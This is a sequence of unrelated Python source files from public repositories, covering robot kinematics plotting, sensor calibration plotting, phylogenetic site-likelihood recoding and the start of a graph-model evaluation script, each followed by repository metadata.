Plot_intertial_params_one(time, data,estimation_approach):\r\n f, axarr = plt.subplots(10,1,figsize=(6,15))\r\n f.suptitle(\"Inertial Parameter Estimation \" + estimation_approach, fontsize=20)\r\n params = ['Mass in $kg$', 'COM_x in $m$','COM_y in $m$', 'COM_z in $m$', '$I_{xx}$','$I_{xy}$', '$I_{xz}$','$I_{yy}$','$I_{yz}$','$I_{zz}$']\r\n data[:,1] /= data[:,0]\r\n data[:,2] /= data[:,0]\r\n data[:,3] /= data[:,0]\r\n for idx, param in enumerate(params):\r\n axarr[idx].plot(time, data[:,idx], c=blue)\r\n axarr[idx].set_title(param)\r\n axarr[idx].set_xlim([0, time[-1]])\r\n axarr[9].set_xlabel(\"Elapsed time in $s$\")\r\n plt.setp([a.get_xticklabels() for a in f.axes[:-1]], visible=False)\r\n plt.tight_layout()\r\n plt.subplots_adjust(top=0.9)\r\n \r\ndef Plot_intertial_params_one_error(time, data,estimation_approach, m, com_x, com_y, com_z, I_xx, I_xy,I_xz, I_yy, I_yz, I_zz):\r\n f, axarr = plt.subplots(10,1,figsize=(6,15))\r\n f.suptitle(\"Inertial Parameter Estimation error \" + estimation_approach, fontsize=20)\r\n params = ['Mass in $kg$', 'COM_x in $m$','COM_y in $m$', 'COM_z in $m$', '$I_{xx}$','$I_{xy}$', '$I_{xz}$','$I_{yy}$','$I_{yz}$','$I_{zz}$']\r\n data[:,1] /= data[:,0]\r\n data[:,2] /= data[:,0]\r\n data[:,3] /= data[:,0]\r\n mse = np.empty_like(data)\r\n real_values = np.array([m, com_x,com_y,com_z, I_xx,I_xy,I_xz,I_yy,I_yz,I_zz])\r\n for idx,value in 
enumerate(real_values): #for all 10 inertial params \r\n for i in np.arange(np.size(data[:,0])): #elementwise \r\n mse[i,idx] = (np.square(data[i,idx] - value)).mean(axis=None)\r\n for idx, param in enumerate(params):\r\n axarr[idx].plot(time, mse[:,idx], c=blue)\r\n axarr[idx].set_title(param)\r\n axarr[idx].set_xlim([0, time[-1]])\r\n axarr[9].set_xlabel(\"Elapsed time in $s$\")\r\n plt.setp([a.get_xticklabels() for a in f.axes[:-1]], visible=False)\r\n plt.tight_layout()\r\n plt.subplots_adjust(top=0.9)\r\n \r\ndef Plot_intertial_params_two(time, data_1,estimation_approach_1, data_2,estimation_approach_2):\r\n f, axarr = plt.subplots(10,2,figsize=(10,15))\r\n f.suptitle(\"Inertial Parameter Estimation \", fontsize=20)\r\n params = ['Mass in $kg$', 'COM_x in $m$','COM_y in $m$', 'COM_z in $m$', '$I_{xx}$','$I_{xy}$', '$I_{xz}$','$I_{yy}$','$I_{yz}$','$I_{zz}$']\r\n data_1[:,1] /= data_1[:,0]\r\n data_1[:,2] /= data_1[:,0]\r\n data_1[:,3] /= data_1[:,0]\r\n data_2[:,1] /= data_2[:,0]\r\n data_2[:,2] /= data_2[:,0]\r\n data_2[:,3] /= data_2[:,0]\r\n for idx, param in enumerate(params):\r\n axarr[idx,0].plot(time, data_1[:,idx], c=blue)\r\n axarr[idx,0].set_title(param)\r\n axarr[idx,0].set_xlim([0, time[-1]])\r\n \r\n for idx, param in enumerate(params):\r\n axarr[idx,1].plot(time, data_2[:,idx], c=red)\r\n axarr[idx,1].set_title(param)\r\n axarr[idx,1].set_xlim([0, time[-1]])\r\n axarr[0,0].set_title(estimation_approach_1)\r\n axarr[9,0].set_xlabel(\"Elapsed time in $s$\")\r\n axarr[0,1].set_title(estimation_approach_2)\r\n axarr[9,1].set_xlabel(\"Elapsed time in $s$\")\r\n plt.setp([a.get_xticklabels() for a in f.axes[:-1]], visible=False)\r\n plt.tight_layout()\r\n plt.subplots_adjust(top=0.9)\r\n \r\ndef Plot_intertial_params_three(time, data_1,estimation_approach_1, data_2,estimation_approach_2, data_3,estimation_approach_3):\r\n f, axarr = plt.subplots(10,3,figsize=(15,15))\r\n f.suptitle(\"Inertial Parameter Estimation \", fontsize=20)\r\n params = ['Mass in $kg$', 'COM_x in $m$','COM_y in $m$', 'COM_z in $m$', '$I_{xx}$','$I_{xy}$', '$I_{xz}$','$I_{yy}$','$I_{yz}$','$I_{zz}$']\r\n data_1[:,1] /= data_1[:,0]\r\n data_1[:,2] /= data_1[:,0]\r\n data_1[:,3] /= data_1[:,0]\r\n data_2[:,1] /= data_2[:,0]\r\n data_2[:,2] /= data_2[:,0]\r\n data_2[:,3] /= data_2[:,0]\r\n data_3[:,1] /= data_3[:,0]\r\n data_3[:,2] /= data_3[:,0]\r\n data_3[:,3] /= data_3[:,0]\r\n for idx, param in enumerate(params):\r\n axarr[idx,0].plot(time, data_1[:,idx], c=blue, label = estimation_approach_1)\r\n axarr[0,0].legend()\r\n axarr[idx,0].set_title(param)\r\n axarr[idx,0].set_xlim([0, time[-1]])\r\n for idx, param in enumerate(params):\r\n axarr[idx,1].plot(time, data_2[:,idx], c=red, label = estimation_approach_2)\r\n axarr[0,1].legend()\r\n axarr[idx,1].set_title(param)\r\n axarr[idx,1].set_xlim([0, time[-1]])\r\n for idx, param in enumerate(params):\r\n axarr[idx,2].plot(time, data_3[:,idx], c=green ,label = estimation_approach_3)\r\n axarr[0,2].legend()\r\n axarr[idx,2].set_title(param)\r\n axarr[idx,2].set_xlim([0, time[-1]])\r\n axarr[9,0].set_xlabel(\"Elapsed time in $s$\")\r\n axarr[9,1].set_xlabel(\"Elapsed time in $s$\")\r\n axarr[9,2].set_xlabel(\"Elapsed time in $s$\")\r\n plt.setp([a.get_xticklabels() for a in f.axes[:-1]], visible=False)\r\n plt.tight_layout()\r\n plt.subplots_adjust(top=0.9)\r\n \r\n\r\ndef Plot_intertial_params_three_errors(time, data_1,estimation_approach_1, data_2,estimation_approach_2, data_3,estimation_approach_3, m, com_x, com_y, com_z, I_xx, I_xy,I_xz, I_yy, I_yz, 
I_zz):\r\n f, axarr = plt.subplots(10,3,figsize=(15,15))\r\n f.suptitle(\"Inertial Parameter Estimation error\", fontsize=20)\r\n params = ['Mass error', 'COM_x error','COM_y error', 'COM_z error', '$I_{xx}$ error','$I_{xy}$ error', '$I_{xz}$ error','$I_{yy}$ error','$I_{yz}$ error','$I_{zz}$ error']\r\n data_1[:,1] /= data_1[:,0]\r\n data_1[:,2] /= data_1[:,0]\r\n data_1[:,3] /= data_1[:,0]\r\n data_2[:,1] /= data_2[:,0]\r\n data_2[:,2] /= data_2[:,0]\r\n data_2[:,3] /= data_2[:,0]\r\n data_3[:,1] /= data_3[:,0]\r\n data_3[:,2] /= data_3[:,0]\r\n data_3[:,3] /= data_3[:,0]\r\n \r\n mse_1 = np.empty_like(data_1)\r\n mse_2 = np.empty_like(data_1)\r\n mse_3 = np.empty_like(data_1)\r\n \r\n real_values = np.array([m, com_x,com_y,com_z, I_xx,I_xy,I_xz,I_yy,I_yz,I_zz])\r\n for idx,value in enumerate(real_values): #for all 10 inertial params \r\n for i in np.arange(np.size(data_1[:,0])): #elementwise \r\n mse_1[i,idx] = (np.square(data_1[i,idx] - value)).mean(axis=None)\r\n for idx,value in enumerate(real_values): #for all 10 inertial params \r\n for i in np.arange(np.size(data_2[:,0])): #elementwise \r\n mse_2[i,idx] = (np.square(data_2[i,idx] - value)).mean(axis=None)\r\n for idx,value in enumerate(real_values): #for all 10 inertial params \r\n for i in np.arange(np.size(data_3[:,0])): #elementwise \r\n mse_3[i,idx] = (np.square(data_3[i,idx] - value)).mean(axis=None)\r\n \r\n \r\n\r\n for idx, param in enumerate(params):\r\n axarr[idx,0].plot(time, mse_1[:,idx], c=blue, label = estimation_approach_1)\r\n axarr[0,0].legend()\r\n axarr[idx,0].set_title(param)\r\n axarr[idx,0].set_xlim([0, time[-1]])\r\n for idx, param in enumerate(params):\r\n axarr[idx,1].plot(time, mse_2[:,idx], c=red, label = estimation_approach_2)\r\n axarr[0,1].legend()\r\n axarr[idx,1].set_title(param)\r\n axarr[idx,1].set_xlim([0, time[-1]])\r\n for idx, param in enumerate(params):\r\n axarr[idx,2].plot(time, mse_3[:,idx], c=green ,label = estimation_approach_3)\r\n axarr[0,2].legend()\r\n axarr[idx,2].set_title(param)\r\n axarr[idx,2].set_xlim([0, time[-1]])\r\n axarr[9,0].set_xlabel(\"Elapsed time in $s$\")\r\n axarr[9,1].set_xlabel(\"Elapsed time in $s$\")\r\n axarr[9,2].set_xlabel(\"Elapsed time in $s$\")\r\n plt.setp([a.get_xticklabels() for a in f.axes[:-1]], visible=False)\r\n plt.tight_layout()\r\n plt.subplots_adjust(top=0.9)\r\n \r\n \r\ndef Plot_one_dim(time, data, ylabel, title):\r\n plt.plot(time, data)\r\n plt.title(title)\r\n plt.ylabel(ylabel)\r\n plt.xlabel(\"Elapsed time in $s$\")\r\n \r\ndef Plot_quaternions(time, quaternions):\r\n w = quaternions[:,0]\r\n x = quaternions[:,1]\r\n y = quaternions[:,2]\r\n z = quaternions[:,3]\r\n f, axarr = plt.subplots(2,2,figsize=(9,9))\r\n f.suptitle(\"Orientation represented as Unit Quaternions\" , fontsize=20)\r\n axarr[0,0].plot(time, w, c=blue)\r\n axarr[0,0].set_title(\"$q_w$\")\r\n axarr[0,0].set_xlim([0, time[-1]])\r\n axarr[0,1].plot(time, x, c=blue)\r\n axarr[0,1].set_title(\"$q_x$\")\r\n axarr[0,1].set_xlim([0, time[-1]])\r\n axarr[1,0].plot(time, y, c=blue)\r\n axarr[1,0].set_title(\"$q_y$\")\r\n axarr[1,0].set_xlim([0, time[-1]])\r\n axarr[1,0].set_xlabel(\"Elapsed time in s\")\r\n axarr[1,1].plot(time, z, c=blue)\r\n axarr[1,1].set_title(\"$q_z$\")\r\n axarr[1,1].set_xlim([0, time[-1]])\r\n axarr[1,1].set_xlabel(\"Elapsed time in s\")\r\n plt.setp([a.get_xticklabels() for a in axarr[0, :]], visible=False)\r\n \r\ndef Plot_kinematics_linear(time, data_1, data_2, data_3, title):\r\n f, axarr = plt.subplots(3,3,figsize=(15,15))\r\n f.suptitle(title, 
fontsize=20)\r\n coordinates = [\"$_x$\",\"$_y$\",\"$_z$\"]\r\n for idx,coordinate in enumerate(coordinates):\r\n axarr[idx,0].plot(time, data_1[:,idx], c=color_list[idx])\r\n axarr[idx,0].set_xlim([0, time[-1]])\r\n axarr[idx,0].set_ylabel(\"$r$\"+str(coordinate)+\" in \" \"$m$\")\r\n for idx,coordinate in enumerate(coordinates):\r\n axarr[idx,1].plot(time, data_2[:,idx], c=color_list[idx])\r\n axarr[idx,1].set_xlim([0, time[-1]])\r\n axarr[idx,1].set_ylabel(\"$v$\"+str(coordinate)+\" in \" r\"$\\frac{m}{s}$\")\r\n for idx,coordinate in enumerate(coordinates):\r\n axarr[idx,2].plot(time, data_3[:,idx], c=color_list[idx])\r\n axarr[idx,2].set_xlim([0, time[-1]])\r\n axarr[idx,2].set_ylabel(\"$a$\"+str(coordinate)+\" in \" r\"$\\frac{m}{s^2}$\")\r\n for idx in np.arange(3):\r\n axarr[2,idx].set_xlabel(\"Elapsed time in $s$\")\r\n plt.setp([a.get_xticklabels() for a in axarr[0, :]], visible=False)\r\n plt.tight_layout()\r\n plt.subplots_adjust(top=0.9)\r\n \r\ndef Plot_kinematics_angular_three_plots(time, quaternions, angular_velocity, angular_acceleration, title):\r\n kinematics_angular = np.concatenate([angular_velocity, angular_acceleration], axis=1)\r\n f, axarr = plt.subplots(1,3,figsize=(20,10))\r\n f.suptitle(title, fontsize=20)\r\n color_list_aux = [ grey, blue, red, green]\r\n coordinates = [\"$_x$\",\"$_y$\",\"$_z$\"]\r\n quaternion_labels = [\"$q_w$\", \"$q_x$\", \"$q_y$\",\"$q_z$\"]\r\n variables = [r\"$\\omega$\", r\"$\\alpha$\"]\r\n units = [r\"$\\frac{rad}{s}$\", r\"$\\frac{rad}{s^2}$\"]\r\n for idx, q_label in enumerate(quaternion_labels):\r\n axarr[0].plot(time, quaternions[:, idx], c = color_list_aux[idx], label = q_label)\r\n axarr[0].set_xlim([0, time[-1]])\r\n axarr[0].legend()\r\n axarr[0].set_xlabel(\"Elapsed time in $s$\")\r\n for j, (variable,unit) in enumerate(zip(variables,units)):\r\n for idx,coordinate in enumerate(coordinates):\r\n axarr[j+1].plot(time, kinematics_angular[:,idx+j*3], c=color_list_aux[idx+1], label = str(variable) + str(coordinate))\r\n axarr[j+1].set_xlim([0, time[-1]])\r\n axarr[j+1].set_ylabel(str(variable) +\" in \" + str(unit))\r\n axarr[j+1].legend()\r\n axarr[j+1].set_xlabel(\"Elapsed time in $s$\")\r\n plt.tight_layout()\r\n plt.subplots_adjust(top=0.9)\r\n \r\ndef Plot_joint_angles(time, angles, title):\r\n joint_lables=['$q_1$','$q_2$','$q_3$','$q_4$','$q_5$','$q_6$','$q_7$']\r\n for i, lable_q in enumerate(joint_lables):\r\n plt.plot(time, angles[:, i], c = color_list[i], label = lable_q )\r\n plt.xlabel(\"Elapsed time in $s$\")\r\n plt.ylabel(\"$rad$\")\r\n plt.legend()\r\n \r\ndef Plot_joint_velocities(time, angles, title):\r\n joint_lables=['$\\dot{q}_1$','$\\dot{q}_2$','$\\dot{q}_3$','$\\dot{q}_4$','$\\dot{q}_5$','$\\dot{q}_6$','$\\dot{q}_7$']\r\n for i, lable_q in enumerate(joint_lables):\r\n plt.plot(time, angles[:, i], c = color_list[i], label = lable_q )\r\n plt.xlabel(\"Elapsed time in $s$\")\r\n plt.ylabel(r\"$\\frac{rad}{s}$\")\r\n plt.legend()\r\n \r\ndef Plot_joint_angles_axis(time, angles, title):\r\n joint_lables=['$q_4$','$q_5$','$q_6$', '$q_7$']\r\n for i, lable_q in enumerate(joint_lables):\r\n plt.plot(time, angles[:, i], c = color_list[i], label = lable_q )\r\n plt.xlabel(\"Elapsed time in $s$\")\r\n plt.ylabel(\"$rad$\")\r\n plt.legend()\r\n \r\ndef Plot_joint_velocities_axis(time, angles, title):\r\n joint_lables=['$\\dot{q}_4$','$\\dot{q}_5$','$\\dot{q}_6$', '$\\dot{q}_7$']\r\n for i, lable_q in enumerate(joint_lables):\r\n plt.plot(time, angles[:, i], c = color_list[i], label = lable_q )\r\n plt.xlabel(\"Elapsed 
time in $s$\")\r\n plt.ylabel(r\"$\\frac{rad}{s}$\")\r\n plt.legend()\r\n \r\ndef Plot_force_torque(time, data_1, data_2):\r\n f, axarr = plt.subplots(3,2,figsize=(15,9))\r\n coordinates = [\"$_x$\",\"$_y$\",\"$_z$\"]\r\n for idx,coordinate in enumerate(coordinates):\r\n axarr[idx,0].plot(time, data_1[:,idx], c=color_list[idx])\r\n axarr[idx,0].set_xlim([0, time[-1]])\r\n axarr[idx,0].set_ylabel(\"$F$\"+str(coordinate)+\" in \" \"$N$\")\r\n for idx,coordinate in enumerate(coordinates):\r\n axarr[idx,1].plot(time, data_2[:,idx], c=color_list[idx])\r\n axarr[idx,1].set_xlim([0, time[-1]])\r\n axarr[idx,1].set_ylabel(r\"$\\tau$\"+str(coordinate)+\" in \" \"$Nm$\")\r\n axarr[2,0].set_xlabel(\"Elapsed time in $s$\")\r\n axarr[2,1].set_xlabel(\"Elapsed time in $s$\")\r\n plt.setp([a.get_xticklabels() for a in axarr[0, :]], visible=False)\r\n plt.tight_layout()\r\n plt.subplots_adjust(top=0.9)\r\n \r\ndef Plot_joint_angles_axis_five(time, angles, title):\r\n joint_lables=['$q_3$','$q_4$','$q_5$','$q_6$', '$q_7$']\r\n for i, lable_q in enumerate(joint_lables):\r\n plt.plot(time, angles[:, i], c = color_list[i], label = lable_q )\r\n plt.xlabel(\"Elapsed time in $s$\")\r\n plt.ylabel(\"$rad$\")\r\n plt.legend()\r\n \r\ndef Plot_joint_velocities_axis_five(time, angles, title):\r\n joint_lables=['$\\dot{q}_3$','$\\dot{q}_4$','$\\dot{q}_5$','$\\dot{q}_6$', '$\\dot{q}_7$']\r\n for i, lable_q in enumerate(joint_lables):\r\n plt.plot( time, angles[:, i], c = color_list[i], label = lable_q )\r\n plt.xlabel(\"Elapsed time in $s$\")\r\n plt.ylabel(r\"$\\frac{rad}{s}$\")\r\n plt.legend() \r\n \r\n\r\n\r\n# In[4]:\r\n\r\n\r\nPlot_intertial_params_one_error (time, phi_RLS, \"Recursive Least Square\",1.3, 0.0 ,0.0, 0.09, 0.015, 0.0, 0.0, 0.15, 0.0, 0.04)\r\nPlot_intertial_params_one(time, phi_RLS, \"Recursive Least Square\")\r\n\r\n\r\n# In[5]:\r\n\r\n\r\nPlot_force_torque(time, force_virtual, torque_virtual)\r\n\r\n\r\n# In[6]:\r\n\r\n\r\nPlot_kinematics_linear(time, pos, vel, accel, \"Linear kinematic variables\")\r\n\r\n\r\n# In[7]:\r\n\r\n\r\nPlot_kinematics_angular_three_plots(time, ori, avel, aaccel, \"Angular kinematic variables\")\r\n\r\n\r\n# In[8]:\r\n\r\n\r\nPlot_joint_angles(time, q, \"Joint angles\")\r\n\r\n\r\n# In[9]:\r\n\r\n\r\nPlot_joint_velocities(time, dq, \"Joint velocities\")\r\n\r\n\r\n# In[10]:\r\n\r\n\r\nPlot_joint_angles_axis_five(time, q_des, \"desired joint angles\")\r\n\r\n\r\n# In[86]:\r\n\r\n\r\nPlot_joint_velocities_axis_five(time, dq_des, \"desired joint velocities\")\r\n\r\n\r\n# In[34]:\r\n\r\n\r\ndef fourier_series(a, b, axis, N, w_f, q0, time):\r\n M_a = np.zeros(shape=(N, axis))\r\n M_b = np.zeros(shape=(N, axis))\r\n for i in np.arange(axis):\r\n for j in np.arange(N):\r\n M_a[j, i] = a[j+(i*2)]\r\n M_b[j, i] = b[j+(i*2)]\r\n \r\n arg = w_f * time\r\n arg_diff = w_f\r\n arg_diff_diff = w_f*w_f\r\n\r\n q = np.zeros(shape=(axis))\r\n dq = np.zeros(shape=(axis))\r\n ddq = np.zeros(shape=(axis))\r\n for i in np.arange(axis):\r\n q[i] = q0[i]\r\n for j in np.arange(N):\r\n q[i] += M_a[j,i] * np.sin(arg*(j+1)) + M_b[j,i] * np.cos(arg*(j+1))\r\n dq[i] += M_a[j,i] * arg_diff * (j+1) * np.cos(arg*(j+1)) - M_b[j,i] * arg_diff * (j+1) * np.sin(arg*(j+1))\r\n ddq[i] += - M_a[j,i] * arg_diff_diff * (j+1)*(j+1) * np.sin(arg*(j+1)) - M_b[j,i] * arg_diff_diff * (j+1)*(j+1) * np.cos(arg*(j+1))\r\n \r\n return q\r\ndef fourier(coeffs_a,coeffs_b,w_f, q0, time):\r\n q = q0\r\n for idx, (a, b) in enumerate(zip (coeffs_a, coeffs_b)):\r\n q += a * np.sin(w_f*time*(idx+1)) + b * 
np.cos(w_f*time*(idx+1))\r\n return q\r\ndef fourier_swevens(coeffs_a, coeffs_b, l_sums, w_f, q0, time):\r\n q = q0\r\n for (a, b, l) in zip (coeffs_a, coeffs_b, l_sums):\r\n q += a * np.sin(w_f*l*time) + b * np.cos(w_f*l*time)\r\n return q\r\n\r\n\r\n# In[98]:\r\n\r\n\r\na = np.array([-0.384447 ,-0.549169 , 0.234551 ,-0.0350113 , -0.187647 ,0.680153 -0.164255, -0.16014 , -0.699964 , -0.228531, -0.075119 , 0.27301 , -0.320018 , -0.110771 ,-0.0350925])\r\nb = np.array([ -0.306378 , -0.210935 , 0.4905 , 0.227061 , 0.209433 , -0.146835, -0.0387504 , 0.0323132 , -0.320253 , -0.285995 , 0.662638 ,-0.0026003 , -0.43539 , 0.134675, 0.185091])\r\n\r\n\r\naxis = 5\r\nN = 3 \r\nT_s = 1/500.0\r\nw_f = 0.628\r\nq0 = np.array([ 0, -115, 0, 60, 60.0])\r\nq0 *= np.pi/180.0\r\n# t = np.arange(60, step = 0.01)\r\n# q = fourier_series(a,b,axis,N, w_f, q0, t)\r\nq = np.array([fourier_series(a,b,axis,N, w_f, q0, t) for t in np.arange(2*np.pi/w_f, step = 0.01)])\r\n# q = np.array([fourier_series(a,b,axis,N, w_f, q0, t) for t in time])\r\nPlot_joint_angles_axis_five(np.arange(2*np.pi/w_f, step = 0.01), q, \"example\")\r\n\r\n\r\n\r\n# In[11]:\r\n\r\n\r\nPlot_joint_angles_axis_five(time, q_des, \"desired joint angles\")\r\n\r\n\r\n# In[36]:\r\n\r\n\r\na = np.array([ 0.974478 , -0.769762])\r\nb = np.array([-0.0587619 , -0.637884])\r\nw_f = 0.3\r\nq = np.array([fourier(a,b,w_f, 0, t) for t in time])\r\nplt.plot(time,q)\r\n\r\n\r\n# In[126]:\r\n\r\n\r\na = np.array([0,2.56e-2])\r\nb = np.array([1.57, 1.57])\r\nl = np.array([1,15])\r\nw_f = 0.17\r\nq0 = 0\r\nT_s = 0.024\r\ntime = np.arange(37, step=T_s)\r\nq = np.array([fourier_swevens(a, b, l, w_f, q0, k) for k in time])\r\nplt.plot(time, q)\r\n \r\n\r\n\r\n# In[143]:\r\n\r\n\r\nfrom constraint import *\r\nproblem = Problem()\r\nproblem.addVariable('a', range(-1,1))\r\nproblem.addVariable('b', range(-1,1))\r\nproblem.addConstraint(lambda a, b: a + b == 5)\r\nproblem.addConstraint(lambda a, b: a * b == 6)\r\nproblem.getSolutions()\r\n\r\n\r\n# In[27]:\r\n\r\n\r\ndef plot_diffs(time, data_1, data_2, data_3):\r\n f, axarr = plt.subplots(3,1,figsize=(10,15))\r\n coordinates = [\"$_x$\",\"$_y$\",\"$_z$\"]\r\n for idx,coordinate in enumerate(coordinates):\r\n axarr[idx].plot(time, data_3[:,idx], c=green, label = \"ableitung computed\")\r\n axarr[idx].plot(time, data_1[:,idx], c=blue, label = \"stamm\")\r\n axarr[idx].plot(time, data_2[:,idx], c=red, label = \"ableitung sim\")\r\n axarr[idx].set_xlim([0, time[-1]])\r\n axarr[idx].set_xlabel(\"Elapsed time in $s$\")\r\n axarr[idx].legend()\r\n axarr[idx].grid(True)\r\n plt.setp([a.get_xticklabels() for a in axarr[0:]], visible=False)\r\n plt.tight_layout()\r\n plt.subplots_adjust(top=0.9)\r\n\r\n\r\n# In[28]:\r\n\r\n\r\nplot_diffs(time, pos, vel, pos_dot)\r\n\r\n\r\n# In[29]:\r\n\r\n\r\nplot_diffs(time, vel, accel, vel_dot)\r\n\r\n\r\n# In[38]:\r\n\r\n\r\nplot_diffs(time, avel, aaccel, avel_dot)\r\n\r\n\r\n# In[39]:\r\n\r\n\r\nplot_diffs(time, avel_sim, aaccel_sim, avel_sim_dot)\r\n\r\n\r\n# In[ ]:\r\n\r\n\r\n\r\n\r\n\r\n# In[ ]:\r\n\r\n\r\n\r\n\r\n","repo_name":"elenamck/inertial_parameter_application","sub_path":"data_collection/simulation/plotter_input_kinematics.py","file_name":"plotter_input_kinematics.py","file_ext":"py","file_size_in_byte":25224,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"40176493502","text":"\nfrom typing import Callable\nimport torch\n\ndef get_activation(activation: str) -> Callable[[torch.Tensor], torch.Tensor]:\n \"\"\" Parse 
","repo_name":"trivnguyen/JeansGNN","sub_path":"src/jeans_gnn/gnn/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"51"} +{"seq_id":"10880179750","text":"import matplotlib.pyplot as plt\nimport matplotlib.animation as anim\nimport math\nimport serial\nimport ser\n\ncorrect = [0]*1024\ns1 = s2 = None\n\ndef calibrate(s1, s2):\n    correct[s1] = (correct[s1] + (s1 - s2)) / 2\n\t#s1 = s1\n\t#s2 += correct[s1]\n
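\n# Added example (sketch): repeated paired readings drive correct[s1] toward the\n# observed sensor offset, since each call averages in the new (s1 - s2) sample:\n#   for raw1, raw2 in [(512, 518), (512, 516)]:\n#       calibrate(raw1, raw2)\n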
\n# draws the plot in real time\ndef plot_update():\n\tsen1 = []\n\tsen2 = []\n\tfig = plt.figure(\"Uncalibrated measurements from the two sensors\")\n\tfig2 = plt.figure(\"Calibrated measurements from the two sensors\")\n\tax = fig.add_subplot(1,1,1)\n\ta2x = fig2.add_subplot(1,1,1)\n\t\n\tdef update(i):\n\t\tsen1i = ser.main()[0]\n\t\tsen2i = ser.main()[1]\n\t\tsen1.append(sen1i)\n\t\tsen2.append(sen2i)\n\t\tx = range(len(sen1))\n\t\tax.clear()\n\t\tax.plot(x[:50], sen1[-50:])\n\t\tax.plot(x[:50], sen2[-50:])\n\n\ta = anim.FuncAnimation(fig, update, repeat=False)\n\tdef update2(i):\n\t\tsen1i = ser.main()[0]\n\t\tsen2i = ser.main()[1] + correct[ser.main()[0]]\n\t\tsen1.append(sen1i)\n\t\tsen2.append(sen2i)\n\t\tx = range(len(sen1))\n\t\ta2x.clear()\n\t\ta2x.plot(x[:50], sen1[-50:])\n\t\ta2x.plot(x[:50], sen2[-50:])\n\t\n\ta2 = anim.FuncAnimation(fig2, update2, repeat=False)\n\tplt.show()\n\n# draws the calibration function\ndef plot_calibrate():\n\tplt.plot(correct)\n\tplt.show()\n","repo_name":"tokelau/mobile_robots","sub_path":"calibration/calibration.py","file_name":"calibration.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"37128341524","text":"#!/usr/bin/env python\n#\n# sitewise_recode_constant_sites.py created 2018-02-02\n\n'''sitewise_recode_constant_sites.py last modified 2018-03-12\n recode constant sites as null from site-wise RAxML or phylobayes tabular output\n\nsitewise_recode_constant_sites.py -a matrix1.aln -l RAxML_perSiteLLs.matrix1.tab > RAxML_perSiteLLs.matrix1_w_const.tab\n\n matrix can be in alternate formats (use -f), and gzipped\n\n generate the tabular sitewise results using:\nsitewise_ll_to_columns.py RAxML_perSiteLLs.matrix1 > RAxML_perSiteLLs.matrix1.tab\n\n tabular likelihood output (-l) is assumed to look like:\nsite\tT1\tT2 ...\n1\t-12.345\t-12.456 ...\n'''\n\nimport sys\nimport argparse\nimport time\nimport gzip\nfrom collections import Counter\nfrom Bio import AlignIO\n\ndef determine_constant_sites(fullalignment, alignformat):\n\t'''read large alignment, and return a dict where keys are constant positions'''\n\tif fullalignment.rsplit('.',1)[1]==\"gz\": # autodetect gzip format\n\t\topentype = gzip.open\n\t\tprint >> sys.stderr, \"# reading alignment {} as gzipped\".format(fullalignment), time.asctime()\n\telse: # otherwise assume normal open\n\t\topentype = open\n\t\tprint >> sys.stderr, \"# reading alignment {}\".format(fullalignment), time.asctime()\n\talignedseqs = AlignIO.read(opentype(fullalignment), alignformat)\n\tnumtaxa = len(alignedseqs)\n\tal_length = alignedseqs.get_alignment_length()\n\tprint >> sys.stderr, \"# Alignment contains {} taxa for {} sites, including gaps\".format( numtaxa, al_length )\n\n\tconstsites = {}\n\tprint >> sys.stderr, \"# determining constant sites\", time.asctime()\n\tfor i in range(al_length):\n\t\talignment_column = alignedseqs[:,i] # all letters per site\n\t\tnumgaps = alignment_column.count(\"-\")\n\t\tnogap_alignment_column = alignment_column.replace(\"-\",\"\").replace(\"X\",\"\") # excluding gaps\n\t\tnum_nogap_taxa = len(nogap_alignment_column)\n\t\taa_counter = Counter( nogap_alignment_column )\n\t\tmostcommonaa = aa_counter.most_common(1)[0][0]\n\n\t\tif len(aa_counter)==1: # site contains only one residue type, i.e. it is constant\n\t\t\tconstsites[i+1] = True # use index plus 1 to match positions\n\t\t\tmostcommoncount = aa_counter.most_common(1)[0][1]\n\tprint >> sys.stderr, \"# Counted {} constant sites\".format( len(constsites) )\n\treturn constsites\n\ndef read_tabular_ln(lntabular, constsites, wayout):\n\t'''read tabular log-likelihood results and print a modified table where constant sites are recoded'''\n\tlinecounter = 0\n\trecodecount = 0\n\tprint >> sys.stderr, \"# Reading log-likelihood by site from {}\".format(lntabular), time.asctime()\n\tfor line in open(lntabular,'r'):\n\t\tline = line.strip()\n\t\tif line: # ignore blank lines\n\t\t\tlinecounter += 1\n\t\t\tif linecounter < 2:\n\t\t\t\tprint >> wayout, line\n\t\t\t\tcontinue\n\t\t\tlsplits = line.split('\\t')\n\t\t\tpos = int(lsplits[0]) # sites begin at 1\n\t\t\tif constsites.get(pos, False): # meaning site is constant, so recode\n\t\t\t\trecodecount += 1\n\t\t\t\trecodedsites = [\"const\"] * len(lsplits[1:])\n\t\t\t\tprint >> wayout, \"{}\\t{}\".format( pos, \"\\t\".join(recodedsites) )\n\t\t\telse:\n\t\t\t\tprint >> wayout, line\n\tprint >> sys.stderr, \"# Read {} lines, recoded {} sites\".format( linecounter,recodecount ), time.asctime()\n\ndef main(argv, wayout):\n\tif not len(argv):\n\t\targv.append('-h')\n\tparser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, description=__doc__)\n\tparser.add_argument('-a','--alignment', help=\"supermatrix alignment\")\n\tparser.add_argument('-f','--format', default=\"fasta\", help=\"alignment format [fasta]\")\n\tparser.add_argument('-l','--log-likelihood', help=\"tabular log-likelihood data file from RAxML\")\n\targs = parser.parse_args(argv)\n\n\tconstsitedict = determine_constant_sites(args.alignment, args.format)\n\tread_tabular_ln(args.log_likelihood, constsitedict, wayout)\n\nif __name__ == \"__main__\":\n\tmain(sys.argv[1:], sys.stdout)\n","repo_name":"wrf/pdbcolor","sub_path":"sitewise_scripts/sitewise_recode_constant_sites.py","file_name":"sitewise_recode_constant_sites.py","file_ext":"py","file_size_in_byte":3780,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"51"} +{"seq_id":"74439666399","text":"import os\nimport torch\nimport torch.nn.functional as F\nfrom data_preparation import prepare_training_data\nimport traceback\nfrom tqdm import tqdm\nfrom model_updated import Model\nfrom sklearn.metrics import roc_auc_score, f1_score, accuracy_score, average_precision_score, auc, precision_recall_curve\nimport torch.optim as optim\nfrom statistics import mean\nimport argparse\nimport utils\n\ndef cross_comm_evaluation(gt_user_user_edges, gt_user_user_labels, pred_comm_to_comm_edges_w_neg, 